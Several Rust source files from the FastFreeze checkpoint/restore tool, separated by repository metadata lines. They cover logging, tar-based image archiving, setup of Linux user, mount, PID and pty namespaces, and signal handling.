self.log_file = Some(match fs::rename(&old_path, &new_path) { Err(e) if e.raw_os_error() == Some(libc::EXDEV) => { // We are moving the file cross devices. So we need to do a // copy, followed by re-opening the file. fs::copy(&old_path, &new_path).with_context(|| format!( "Failed to copy {} to {}", old_path.display(), new_path.display()))?; let new_file = fs::OpenOptions::new() .append(true) .open(&new_path) .with_context(|| format!("Failed to re-open log file at {}", new_path.display()))?; fs::remove_file(&old_path) .with_context(|| format!("Failed to unlink {}", old_path.display()))?; (new_file, new_path) }, Err(e) => Err(e).with_context(|| format!( "Failed to rename {} to {}", old_path.display(), new_path.display()))?, Ok(()) => (old_file, new_path), }) } Ok(()) } } lazy_static! { static ref LOGGER: Mutex<Option<Logger>> = Mutex::new(None); } pub fn is_logger_ready() -> bool { LOGGER.lock().unwrap().is_some() } pub fn move_log_file(directory: &Path) -> Result<()> { if let Some(logger) = LOGGER.lock().unwrap().as_mut() { create_dir_all(directory)?; logger.move_file(directory)?; } Ok(()) } pub struct LoggerRef(&'static Mutex<Option<Logger>>); impl log::Log for LoggerRef { fn enabled(&self, _metadata: &Metadata) -> bool { true } fn log(&self, record: &Record) { self.0.lock().unwrap().as_mut().map(|l| l.log(record)); } fn flush(&self) { self.0.lock().unwrap().as_mut().map(|l| l.flush()); } } fn open_log_file(cmd_name: &str) -> Result<(fs::File, PathBuf)> { create_dir_all(&*FF_LOG_DIR)?; // When using FastFreeze in container mode, logs are opened in this directory, // which can be shared with other users. So we make it /tmp like let _ = set_tmp_like_permissions(&*FF_LOG_DIR); // We pick a random log filename. This is because the log file is saved in the checkpoint // image. When we restore, we need to preserve the previous log. Having different log files // makes it easier to do so. 
let log_file_path = FF_LOG_DIR.join( format!("ff-{}-{}-{}.log", Utc::now().format("%Y%m%d-%H%M%S"), cmd_name, &*INVOCATION_ID)); let log_file = fs::OpenOptions::new() .create(true) .append(true) .open(&log_file_path) .with_context(|| format!("Failed to create log file at {}", log_file_path.display()))?; Ok((log_file, log_file_path)) } pub fn init(level: LevelFilter, cmd_name: &'static str, use_log_file: bool) -> Result<()> { // Initializing the logger twice would be a logic error, so it's safe to unwrap(). log::set_boxed_logger(Box::new(LoggerRef(&LOGGER))).unwrap(); log::set_max_level(level); let log_file = if use_log_file { Some(open_log_file(cmd_name)?) } else { None }; let logger = Logger { cmd_name, log_file, stdout_enabled: false }; LOGGER.lock().unwrap().replace(logger); if use_log_file { // We log the time, hostname and invocation ID in the log file, skipping stdout. let host = hostname::get().map_or_else( |err| format!("<{}>", err), |h| h.to_string_lossy().to_string()); warn!("Time is {}", Utc::now().to_rfc2822()); warn!("Host is {}", host); warn!("Invocation ID is {}", &*INVOCATION_ID); } LOGGER.lock().unwrap().as_mut().map(|l| l.stdout_enabled = true); Ok(()) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/filesystem.rs
src/filesystem.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use std::{ path::PathBuf, collections::HashSet, fs, }; use crate::{ consts::*, process::{Command, Stdio}, }; lazy_static! { static ref TAR_CMD: String = std::env::var("TAR_CMD") .unwrap_or_else(|_| "tar".to_string()); } pub fn tar_cmd(preserved_paths: HashSet<PathBuf>, stdout: fs::File) -> Command { let mut cmd = Command::new(&[&*TAR_CMD]); // TODO We can't emit log lines during tarring, because we log them // And the log file is included in the tar archive. tar detects that the log file // is changing, and fails, ruining the fun. So we don't pass --verbose on tar for now // as it would emit output during tarring. We can come back to that issue later. 
/* if log_enabled!(log::Level::Trace) { cmd.arg("--verbose"); } */ cmd.args(&[ "--directory", "/", "--create", "--preserve-permissions", "--ignore-failed-read", // Allows us to discard EPERM errors of files in /tmp "--sparse", // Support sparse files efficiently, libvirttime uses one "--file", "-", ]) .arg("--exclude").arg(&*NO_PRESERVE_FF_DIR) .arg("--exclude").arg(&*CONTAINERS_DIR) .args(&preserved_paths) .arg(&*FF_DIR) .stdout(Stdio::from(stdout)); cmd } pub fn untar_cmd(stdin: fs::File) -> Command { let mut cmd = Command::new(&[&*TAR_CMD]); if log_enabled!(log::Level::Trace) { cmd.arg("--verbose"); } cmd.args(&[ "--directory", "/", "--extract", "--preserve-permissions", "--no-overwrite-dir", "--file", "-", ]) .stdin(Stdio::from(stdin)); cmd }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/container.rs
src/container.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ fs, path::PathBuf, io::ErrorKind, path::Path, os::unix::io::{RawFd}, collections::HashSet, }; use nix::{ mount::{mount, MsFlags}, sched::{unshare, CloneFlags}, sys::signal::{self, kill}, sys::wait::{waitpid, WaitStatus}, sys::stat::Mode, unistd::{ fork, ForkResult, Pid, getuid, getgid, Uid, Gid, lseek64, Whence, dup2, close, }, errno::Errno, fcntl::{fcntl, FcntlArg, open, OFlag}, }; use caps::CapSet; use crate::{ consts::*, cli::{ExitCode, install, run::is_app_running}, process::{monitor_child, ChildDied}, util::{ create_dir_all, set_tmp_like_permissions, openat, setns, readlink_fd, get_inheritable_fds, is_term }, logger, }; /// FastFreeze requires the following to run applications: /// 1) Hijack the ELF system loader (/lib/ld-linux.so). This is important to achieve the following: /// a) Virtualize CPUID, which needs to happen before libc's ELF loader run. /// b) Force time user-space virtualization to all processes by LD_PRELOADing libvirttime. /// Even if a program clears the environment, our hijacking loader will set LD_PRELOAD before /// any program gets to initialize. /// /// 2) Control PIDs of processes. During restore, we need to have the same PIDs as /// during checkpointing. /// /// 3) Optionally, virtualize /dev/pts/N to avoid conflits. 
/// /// 4) Optionally, gain CAP_SYS_ADMIN (or CAP_CHECKPOINT_RESTORE) so that we can /// restore the /proc/self/exe link. /// /// We need a few namespaces to accomplish all this. /// a) First, we need a user namespace to be able to create other namespaces. This also /// gives us 4). /// b) Then we need a mount namespace, to do 1) and 3). /// c) Then we need a PID namespace to do 3). /// /// We distinguish 3 cases of operations: /// * NSCapabilities::Full: We have access to all namespaces. Great. /// * NSCapabilities::MountOnly: We don't have access to PID namespaces because /proc has /// subdirectories that are read-only mounted preventing a remount of /proc. This /// is typical within a Kubernetes environment. /// * NSCapabilities::None: We can't create any sort of namespaces. That's typical when running /// within Docker. In this case, our ELF loader must be installed manually, as root. /// This is done with `fastfreeze install`. /// Note that we don't want to set any of executables setuid. It makes them secure, /// which creates all sorts of problems, such as LD_LIBRARY_PATH not being honored. /// /// Note that only with NSCapabilities::Full can we run multiple applications at /// the same time (their PIDs will collide otherwise). This is why only in that case we /// mount bind /var/tmp/fastfreeze to /tmp/fastfreeze/app_name. /// /// The way the functionality of this file is the following: /// cli/run.rs calls ns_capabilities() to figure out what namespace we have available. It then /// figures out what to do. /// Under NSCapabilities::Full: /// - `create(app_name)` is called to create the namespaces. /// - `nsenter(app_name)` is called to enter the namespaces (used during checkpointing). /// Under NSCapabilities::MountOnly: /// - `create_without_pid_ns()` is called to create the user and mount namespace. /// - `nsenter_without_pid_ns()` is called to enter the namespaces. 
/// The `nsenter*()` functions are called from the same entry point, `maybe_nsenter_app()` #[derive(PartialEq)] pub enum NSCapabilities { None, MountOnly, Full, } impl NSCapabilities { pub fn has_restrictions(&self) -> bool { *self != Self::Full } pub fn can_mount_ns(&self) -> bool { *self != Self::None } } /// When /proc/sys is mounted read-only (or any other subpath of /proc), we won't /// be able to re-mount /proc. Attempting to create a container is futile in this case. pub fn ns_capabilities() -> Result<NSCapabilities> { fn test_in_child_process(child_fn: impl FnOnce() -> Result<()>) -> Result<bool> { match fork()? { ForkResult::Child => { let result = child_fn(); std::process::exit(if result.is_ok() { 0 } else { 1 }); } ForkResult::Parent { child } => { let result = waitpid(child, None)?; Ok(matches!(result, WaitStatus::Exited(_, 0))) }, } } let can_create_mount_ns = test_in_child_process(|| -> Result<()> { unshare(CloneFlags::CLONE_NEWUSER | CloneFlags::CLONE_NEWNS)?; Ok(()) })?; let can_create_pid_ns = test_in_child_process(|| -> Result<()> { // We don't call prepare_pid_namespace() because it does too much // The following is sufficient to test what we need unshare(CloneFlags::CLONE_NEWUSER | CloneFlags::CLONE_NEWNS | CloneFlags::CLONE_NEWPID)?; ensure!(test_in_child_process(|| -> Result<()> { let proc_mask = MsFlags::MS_NOSUID | MsFlags::MS_NODEV | MsFlags::MS_NOEXEC; mount(Some("proc"), "/proc", Some("proc"), proc_mask, None as Option<&str>)?; Ok(()) })?, "mount proc failed"); Ok(()) })?; let cap = match (can_create_mount_ns, can_create_pid_ns) { // Docker blocks the the use of namespaces with seccomp by default. // It's not a big deal. User can run `fastfreeze install` when creating the docker image. // run() will emit a proper error message. (false, _) => NSCapabilities::None, // We could be on Kubernetes, where we have a shadow /proc preventing us to // use a PID namespace correctly, but we can do mount namespaces. 
(true, false) => NSCapabilities::MountOnly, (true, true) => NSCapabilities::Full, // We don't consider the case where we can only create a pid ns, and not // a mount ns because it's very unlikely. }; // MountOnly deserves a debug message here as we want to report if /proc is read-only protected. if cap == NSCapabilities::MountOnly { let is_proc_ro_protected = || -> Result<bool> { let content = fs::read_to_string("/proc/self/mounts") .context("Failed to read /proc/self/mounts")?; // if we find a line like this: "proc /proc/sys proc ro,relatime 0 0", it's game over. for line in content.lines() { let line_elems = line.split_whitespace().collect::<Vec<_>>(); if let [_dev, path, _fstype, opts, ..] = *line_elems { if path.starts_with("/proc/sys") && opts.split(',').any(|x| x == "ro") { return Ok(true); } } } Ok(false) }; debug!("PID namespaces are not supported{}", if is_proc_ro_protected()? { " because /proc is read-only protected" } else { "" }); debug!("Running multiple applications is not supported, and controlling PIDs may be slow"); } Ok(cap) } // User namespace ////////////////////////////////// fn raise_all_effective_caps_to_ambient() -> Result<()> { // We raise all namespace capabilities to ambient to avoid permission issues. // We need CAP_SYS_ADMIN (or CAP_CHECKPOINT_RESTORE), at the very least. // for writing to /proc/sys/kernel/ns_last_pid. for cap in caps::read(None, CapSet::Effective)? { trace!("Raising {}", cap); caps::raise(None, CapSet::Inheritable, cap) .with_context(|| format!("Failed to make {} inheritable", cap))?; caps::raise(None, CapSet::Ambient, cap) .with_context(|| format!("Failed to make {} ambient", cap))?; } Ok(()) } fn prepare_user_namespace() -> Result<()> { // The user namespace gives us the ability to mount /proc, mount bind, and // control /proc/sys/kernel/ns_last_pid. 
let uid = getuid(); let gid = getgid(); unshare(CloneFlags::CLONE_NEWUSER) .context("Failed to create user namespace")?; raise_all_effective_caps_to_ambient()?; // We preserve our uid/gid to make things as transparent as possible for the user. // However, it doesn't always work on old kernels. So FF_FAKE_ROOT will drop uid to 0. let (new_uid, new_gid) = if std::env::var_os("FF_FAKE_ROOT").map_or(false, |v| v == "1") { (Uid::from_raw(0), Gid::from_raw(0)) } else { (uid, gid) }; fs::write("/proc/self/setgroups", "deny") .context("Failed to write to /proc/self/setgroups")?; fs::write("/proc/self/uid_map", format!("{} {} 1", new_uid, uid)) .context("Failed to write to /proc/self/uid_map")?; fs::write("/proc/self/gid_map", format!("{} {} 1", new_gid, gid)) .context("Failed to write to /proc/self/gid_map")?; Ok(()) } // FS namespace ////////////////////////////////// fn mount_bind(from: impl AsRef<Path>, to: impl AsRef<Path>) -> Result<()> { let from = from.as_ref(); let to = to.as_ref(); // It seems that we don't need to mount with MS_PRIVATE. mount(Some(from), to, None as Option<&str>, MsFlags::MS_BIND, None as Option<&str>) .with_context(|| format!("Failed to bind mount {} to {}", from.display(), to.display())) } fn prepare_fs_namespace(name: &str) -> Result<()> { // Note: When this function fails, there's no undo for has already been done. That's okay. // We create the directory that holds all the containers with /tmp-like // permissions to allow other users to use the same directory. It's okay if it fails create_dir_all(&*CONTAINERS_DIR)?; let _ = set_tmp_like_permissions(&*CONTAINERS_DIR); // We'll mount bind on FF_DIR. Its writability is not required. It can even // be owned by another user. Note that we probably already have this directory // created by the logger. create_dir_all(&*FF_DIR)?; // The mount namespace allows us to provide a private ff_dir=/var/tmp/fastfreeze // and hijack the system ELF loader. 
// It's also necessary for the PID namespace to provide a correct /proc mount. unshare(CloneFlags::CLONE_NEWNS) .context("Failed to create mount namespace")?; let private_ff_dir = CONTAINERS_DIR.join(name); let _ = fs::remove_dir_all(&private_ff_dir); create_dir_all(&private_ff_dir)?; // We relocate the log file in the container's log file directory. // This is helpful to preserve log files in checkpointed images. logger::move_log_file(&private_ff_dir.join("logs"))?; // It seems that we don't need to remount / with MS_SLAVE to make // our mounts private. mount_bind(&private_ff_dir, &*FF_DIR)?; install::prepare_ff_dir()?; mount_bind(&*LD_VIRTCPUID_PATH, &*LD_SYSTEM_PATH)?; // We want to give the application a /tmp that we'll include in our image, // but we can't just mount bind it on /tmp. That's because it would be confusing // for users when trying to exchange files from the host to the containered app // via /tmp (for example when using Jupyter notebooks). // Setting TMPDIR to an empty directory is a good compromise. create_dir_all(&*CONTAINER_APP_TMP)?; let _ = set_tmp_like_permissions(&*CONTAINER_APP_TMP); std::env::set_var("TMPDIR", &*CONTAINER_APP_TMP); Ok(()) } // We are just hijacking the system ELF loader fn prepare_fs_namespace_virt_install_only() -> Result<()> { unshare(CloneFlags::CLONE_NEWNS) .context("Failed to create mount namespace")?; install::prepare_ff_dir()?; mount_bind(&*LD_VIRTCPUID_PATH, &*LD_SYSTEM_PATH)?; Ok(()) } fn cleanup_current_container() { // The container has died. We clean up the container pid file to speed up // the enumeration of running containers and also make it more reliable. let _ = fs::remove_file(&*CONTAINER_PID); // We remove NO_PRESERVE_FF_DIR and other files to save a bit of space. // This does not remove fastfreeze logs files and the tmpdir of the // application. Maybe the user wants to keep these files. It's fine because // these files reside on /tmp, which will get eventually cleaned away by the OS. 
let _ = fs::remove_file(&*LD_INJECT_ENV_PATH); let _ = fs::remove_file(&*VIRT_TIME_CONF_PATH); let _ = fs::remove_file(&*APP_CONFIG_PATH); let _ = nix::mount::umount(&*CONTAINER_PTY); // to avoid EBUSY when deleting. let _ = fs::remove_dir_all(&*NO_PRESERVE_FF_DIR); } // PTY "namespace" ////////////////////////////////// // Takes a slice of TTY fds, and return the path (/dev/pts/X) of the TTY. // Note that we take an array of TTY fds to ensure that they all point to the // same TTY, but semantically, we would be taking just a single fd. fn get_tty_path(tty_fds: &[RawFd]) -> Result<Option<PathBuf>> { if tty_fds.is_empty() { return Ok(None); } let paths = tty_fds.iter() .copied() .map(readlink_fd) .collect::<Result<HashSet<_>>>()?; assert!(!paths.is_empty()); ensure!(paths.len() == 1, "Multiple TTYs detected ({:?}), this is not supported", paths); Ok(paths.into_iter().next()) } fn prepare_pty_namespace(inheritable_tty_path: Option<&PathBuf>) -> Result<()> { // We need a new pts namespace during checkpoint/restore because: // 1) we pass the current pty (what we currently hold as stderr for example) // to the child. It needs to be deterministic because when we restore, it // needs to have the same name. We'll use /dev/pts/0 for passing down our pty. // 2) PTYs created in the container (by a program like tmux or sshd) // need to be conflict free when restoring (/dev/pts/N should be available), // so we need some amount of virtualization. // We want to mount new namespace on /dev/pts, but we want to map our current pty // to /dev/pts/0. We'll do some trickeries with mount binds to achieve that. // Another solution would be to create a new pty, and proxy data to/from our // current pty. But that's a bunch of pain, and not what we really want. // Step 1: Make a bind backup of our /dev/pts/N to CONTAINER_PTY because we are // about to hide it with the next mount. 
if let Some(ref tty_path) = inheritable_tty_path { debug!("Mapping PTY {} to a new PTY namespace as /dev/pts/0", tty_path.display()); fs::File::create(&*CONTAINER_PTY) .with_context(|| format!("Failed to create file {}", CONTAINER_PTY.display()))?; mount_bind(&tty_path, &*CONTAINER_PTY)?; } // Step 2: Make the /dev/pts namespace // We pass the ptmxmode=0666 option so that the permissions of /dev/ptmx is // accessible by all to create new PTYs, useful for applications like tmux // or sshd. // We wish to pass the options gid=5,mode=0620 (tty group) but we get // -EINVAL if we try, it has probably something to do with the way we map // our uid/gid in user_namespace(). This is not really important. mount(Some("devpts"), "/dev/pts", Some("devpts"), MsFlags::MS_NOSUID | MsFlags::MS_NOEXEC, Some("ptmxmode=0666")) .context("Failed to mount /dev/pts")?; mount_bind("/dev/pts/ptmx", "/dev/ptmx")?; // Step 3: mount bind CONTAINER_PTY to /dev/pts/0. // For this to work, /dev/pts/0 must exist. So we create a dummy pts // that we keep open to ensure that the mount bind survives. // We leak the fd on purpose so it doesn't get closed. 
if inheritable_tty_path.is_some() { let ptmx_fd = fs::OpenOptions::new() .read(true).write(true) .open("/dev/ptmx") .context("Failed to open /dev/ptmx to create a dummy PTY")?; std::mem::forget(ptmx_fd); mount_bind(&*CONTAINER_PTY, "/dev/pts/0")?; } Ok(()) } fn reopen_fds(inheritable_fds: &[RawFd], inheritable_tty_fds: &[RawFd]) -> Result<()> { fn reopen_fd(fd: RawFd, path: &Path) -> Result<()> { let flags = fcntl(fd, FcntlArg::F_GETFL)?; let flags = unsafe { OFlag::from_bits_unchecked(flags) }; let pos = match lseek64(fd, 0, Whence::SeekCur) { Ok(pos) => Some(pos), Err(e) if e.as_errno() == Some(Errno::ESPIPE) => None, Err(e) => Err(e).context("lseek() failed")?, }; let new_fd = open(path, flags, Mode::empty()).context("open() failed")?; if let Some(pos) = pos { lseek64(new_fd, pos, Whence::SeekSet).context("lseek() failed")?; } dup2(new_fd, fd).context("dup2() failed")?; close(new_fd).context("close() failed")?; Ok(()) } for &fd in inheritable_fds { let path = if inheritable_tty_fds.contains(&fd) { PathBuf::from("/dev/pts/0") } else { readlink_fd(fd)? }; // Re-open files that are accessible from the file system. if path.starts_with("/") { reopen_fd(fd, &path) .with_context(|| format!("Failed to re-open {}", path.display()))?; } } Ok(()) } fn prepare_pty_namespace_and_reopen_fds() -> Result<()> { let fds = get_inheritable_fds()?; let tty_fds: Vec<_> = fds.iter().cloned().filter(|fd| is_term(*fd)).collect(); let tty_path = get_tty_path(&tty_fds)?; prepare_pty_namespace(tty_path.as_ref())?; reopen_fds(&fds, &tty_fds)?; Ok(()) } // PID namespace ////////////////////////////////// fn container_monitor_exit_process(monitor_child_result: Result<()>) -> ! 
{ if let Err(e) = monitor_child_result { // Our child logs errors when exiting, so we skip logging in this case match e.downcast_ref::<ChildDied>() { Some(ChildDied::Exited(_)) => {}, _ => { log::error!("{:#}", e) }, } let exit_code = ExitCode::from_error(&e); std::process::exit(exit_code as i32); } std::process::exit(0); } fn write_container_pid_file(pid: Pid) -> Result<()> { fs::write(&*CONTAINER_PID, format!("{}\n", pid)) .with_context(|| format!("Failed to write to file {}", CONTAINER_PID.display())) } fn prepare_pid_namespace() -> Result<()> { unshare(CloneFlags::CLONE_NEWPID) .context("Failed to create PID namespace")?; if let ForkResult::Parent { child: container_pid } = fork()? { // We write down the container init process pid. It will be useful later // to entering the container when checkpointing (or with nsenter). // If we fail, we kill the container immediately. write_container_pid_file(container_pid) .map_err(|e| { let _ = kill(container_pid, signal::SIGKILL); e })?; let result = monitor_child(container_pid); cleanup_current_container(); container_monitor_exit_process(result); // unreachable } // We are now in the new PID namespace, as the init process // We can mount /proc because we have a root-mapped user namespace :) // This won't work if we are in a docker/kubernetes environment with a // protected /proc with a bunch of read-only subdirectory binds. let proc_mask = MsFlags::MS_NOSUID | MsFlags::MS_NODEV | MsFlags::MS_NOEXEC; mount(Some("proc"), "/proc", Some("proc"), proc_mask, None as Option<&str>) .context("Failed to mount /proc")?; if matches!(fs::OpenOptions::new().write(true).open("/proc/sys/kernel/ns_last_pid"), Err(e) if e.raw_os_error() == Some(libc::EACCES)) { warn!("WARN: /proc/sys/kernel/ns_last_pid is not writable, which can slow down restores. \ This can typically be fixed by upgrading your kernel. 
\ Another solution is to remap your uid to uid=0 in the container, which you can do \ by running fastfreeze with FF_FAKE_ROOT=1"); } Ok(()) } fn open_container_proc_dir(name: &str) -> Result<Option<fs::File>> { let inner = || -> Result<fs::File> { let pid_file_path = CONTAINERS_DIR.join(name).join("run/pid"); let pid = fs::read_to_string(&pid_file_path) .with_context(|| format!("Failed to read {}", pid_file_path.display()))?; let pid = pid.trim().parse::<u32>() .with_context(|| format!("Failed to parse {}", pid_file_path.display()))?; let proc_path = format!("/proc/{}", pid); let proc_file = fs::File::open(&proc_path) .with_context(|| format!("Failed to open {}", proc_path))?; Ok(proc_file) }; match inner() { Err(e) if e.downcast_ref::<std::io::Error>().map(|e| e.kind()) == Some(ErrorKind::NotFound) => Ok(None), Err(e) => Err(e), Ok(f) => Ok(Some(f)), } } pub fn get_running_containers() -> Result<Vec<String>> { // CONTAINERS_DIR may not exist, so we'll get NotFound errors. The code is a // little ugly because read_dir() can return errors, and entries can too. 
let containers = fs::read_dir(&*CONTAINERS_DIR) .and_then(|entries| entries .map(|name| name .map(|n| n.file_name().to_string_lossy().into_owned()) ).collect() ).or_else(|e| if e.kind() == ErrorKind::NotFound { Ok(vec![]) } else { Err(e) }) .with_context(|| format!("Failed to readdir {}", CONTAINERS_DIR.display()))?; let mut result = vec![]; for name in containers { if open_container_proc_dir(&name)?.is_some() { result.push(name); } } Ok(result) } pub fn create(name: &str) -> Result<()> { // First we check if the container is already running if open_container_proc_dir(name)?.is_some() { bail!("Error: The application `{}` is already running.\n\ Use `--app-name <name>` to specify a different name", name); } info!("Creating container for app named `{}`", name); prepare_user_namespace()?; prepare_fs_namespace(name)?; prepare_pty_namespace_and_reopen_fds()?; // The following forks and we become the init process of the container. We // prefer doing this compared to having the application being the init // process for the container because it matches the same hierachy that we // would have if we relied on kubernetes for creating our container. // fastfreeze is pid=1 in both cases. prepare_pid_namespace()?; Ok(()) } pub fn create_without_pid_ns() -> Result<()> { debug!("Creating a user and mount namespace to virtualize the system ELF loader"); prepare_user_namespace()?; prepare_fs_namespace_virt_install_only()?; prepare_pty_namespace_and_reopen_fds()?; Ok(()) } fn nsenter(name: &str) -> Result<()> { let container_proc_dir = open_container_proc_dir(name)? .ok_or_else(|| anyhow!("Error: The application `{}` is not running", name))?; // We relocate the log file in the container's log file directory. // This is helpful to preserve log files in checkpointed images. // We need to do this first, because once we enter the mount namespace, // we won't see the log file anymore. 
let private_ff_dir = CONTAINERS_DIR.join(name); logger::move_log_file(&private_ff_dir.join("logs"))?; let namespaces = [ ("ns/user", CloneFlags::CLONE_NEWUSER), ("ns/mnt", CloneFlags::CLONE_NEWNS), ("ns/pid", CloneFlags::CLONE_NEWPID) ]; for (ns_path, clone_flag) in &namespaces { let nsfile = openat(&container_proc_dir, ns_path)?; setns(&nsfile, *clone_flag)?; } raise_all_effective_caps_to_ambient()?; if let ForkResult::Parent { child: pid } = fork()? { let result = monitor_child(pid); container_monitor_exit_process(result); // unreachable } Ok(()) } fn nsenter_without_pid_ns() -> Result<()> { let namespaces = [ ("ns/user", CloneFlags::CLONE_NEWUSER), ("ns/mnt", CloneFlags::CLONE_NEWNS), ]; let container_proc_dir = fs::File::open(format!("/proc/{}", APP_ROOT_PID))?; for (ns_path, clone_flag) in &namespaces { let nsfile = openat(&container_proc_dir, ns_path)?; setns(&nsfile, *clone_flag)?; } raise_all_effective_caps_to_ambient()?; Ok(()) } fn maybe_nsenter_without_pid_ns() -> Result<()> { let current_user_ns = fs::read_link("/proc/self/ns/user") .context("Failed to readlink(/proc/self/ns/user)")?; let target_user_ns = fs::read_link(format!("/proc/{}/ns/user", APP_ROOT_PID)) .context("Failed to readlink(/proc/self/ns/user)")?; if current_user_ns != target_user_ns { nsenter_without_pid_ns()?; } Ok(()) } /// Enter the application container when the user provides us with its app name. /// If no container name is provided, we enter the container that we see running. /// If we see no containers, we'll see if an application is running outside of a /// proper container which is what happens with Docker/Kubernetes. 
pub fn maybe_nsenter_app(app_name: Option<&String>) -> Result<()> { if let Some(ref app_name) = app_name { ensure!(!app_name.is_empty(), "app_name is empty"); nsenter(app_name) } else { match get_running_containers()?.as_slice() { [] if is_app_running() => maybe_nsenter_without_pid_ns(), [] => bail!("Error: No application is running"), [single_container] => nsenter(single_container), names => { let formatted_names = names.iter() .map(|c| format!("* {}", c)) .collect::<Vec<_>>() .join("\n"); bail!("Multiple applications are running, so you must pick one.\n\ Re-run the same command with one of the following appended to the command\n{}", formatted_names); }, } } }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/signal.rs
src/signal.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::Result; use std::{ error::Error, fmt::Display, fs::File, io::{BufReader, ErrorKind}, path::Path, result::Result as StdResult, sync::atomic::{AtomicBool, Ordering} }; use std::io::prelude::*; use nix::{ sys::signal::{self, kill, Signal}, errno::Errno, unistd::Pid }; lazy_static! { static ref SIGTERM_RECEIVED: AtomicBool = AtomicBool::new(false); } pub fn trap_sigterm_and_friends() -> Result<()> { for signal in &[signal::SIGTERM, signal::SIGHUP, signal::SIGINT] { unsafe { // We cannot emit a log message in the signal handler as it // would be unsafe to allocate memory. signal_hook::low_level::register(*signal as i32, || SIGTERM_RECEIVED.store(true, Ordering::SeqCst))?; } } Ok(()) } #[derive(Debug)] pub struct TerminationRequestedError; impl Error for TerminationRequestedError {} impl Display for TerminationRequestedError { fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "Termination requested") } } /// Returns an error when a SIGTERM has been received. The signal is /// consumed, meaning that a subsequent call to `check_for_pending_sigterm()` /// will succeed unless another SIGTERM is received. 
pub fn check_for_pending_sigterm() -> Result<()> { if SIGTERM_RECEIVED.swap(false, Ordering::SeqCst) { info!("Termination requested"); bail!(TerminationRequestedError); } Ok(()) } pub trait IsErrorInterrupt { fn is_interrupt(&self) -> bool; } impl IsErrorInterrupt for nix::Error { fn is_interrupt(&self) -> bool { matches!(&self, Self::Sys(errno) if *errno == Errno::EINTR) } } impl IsErrorInterrupt for std::io::Error { fn is_interrupt(&self) -> bool { self.kind() == ErrorKind::Interrupted } } impl IsErrorInterrupt for anyhow::Error { fn is_interrupt(&self) -> bool { match self.downcast_ref::<nix::Error>() { Some(e) if e.is_interrupt() => return true, _ => {} } match self.downcast_ref::<std::io::Error>() { Some(e) if e.is_interrupt() => return true, _ => {} } false } } pub fn retry_on_interrupt<R,E>(mut f: impl FnMut() -> StdResult<R,E>) -> StdResult<R,E> where E: IsErrorInterrupt { loop { match f() { Err(e) if e.is_interrupt() => {} other => return other, } } } fn get_children(pid: Pid) -> Result<Vec<Pid>> { let task_dir = Path::new("/proc").join(pid.to_string()).join("task"); let mut children_str = String::new(); // We are okay to fail to open the task directory. That would mean that the // task just disappeared. if let Ok(task_dir_reader) = task_dir.read_dir() { for task_entry in task_dir_reader { // The children file ends with a space, and no new line, making it // suitable to read repeatedly, and append the content in a single string buffer. // Note: We tolerate open failures as the child may disappear. if let Ok(mut file) = File::open(task_entry?.path().join("children")) { file.read_to_string(&mut children_str)?; } } } Ok(children_str.trim().split_whitespace() .map(|pid| Pid::from_raw(pid.parse::<i32>().expect("non-numeric pid"))) .collect()) } fn get_process_tree(root_pid: Pid) -> Result<Vec<Pid>> { fn get_process_tree_inner(pid: Pid, pids: &mut Vec<Pid>) -> Result<()> { pids.push(pid); for child in get_children(pid)? 
{ get_process_tree_inner(child, pids)?; } Ok(()) } let mut pids = Vec::new(); get_process_tree_inner(root_pid, &mut pids)?; Ok(pids) } /// Kill an entire process group. It is not atomic. /// Tasks may appear while we are traversing the tree. /// This is mostly used to SIGSTOP/SIGCONT the entire application. /// TODO We could use the cgroup freezer if we have access to it. pub fn kill_process_tree(root_pid: Pid, signal: Signal) -> Result<()> { for pid in get_process_tree(root_pid)? { // We ignore kill errors as process may disappear. // It's not really satisfactory, but I'm not sure if we can do better. let _ = kill(pid, signal); } Ok(()) } pub fn get_proc_state(pid: Pid) -> Result<char> { let status_path = Path::new("/proc").join(pid.to_string()).join("status"); let status_file = File::open(status_path)?; for line in BufReader::new(status_file).lines() { // lines are of the format "Key:\tValue" // We are looking for the state line "State: R (running)" if let [key, value] = *line?.split(":\t").collect::<Vec<_>>() { if key == "State" { return Ok(value.chars().next().expect("proc status file corrupted")); } } } bail!("Failed to parse proc status file"); }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/criu.rs
src/criu.rs
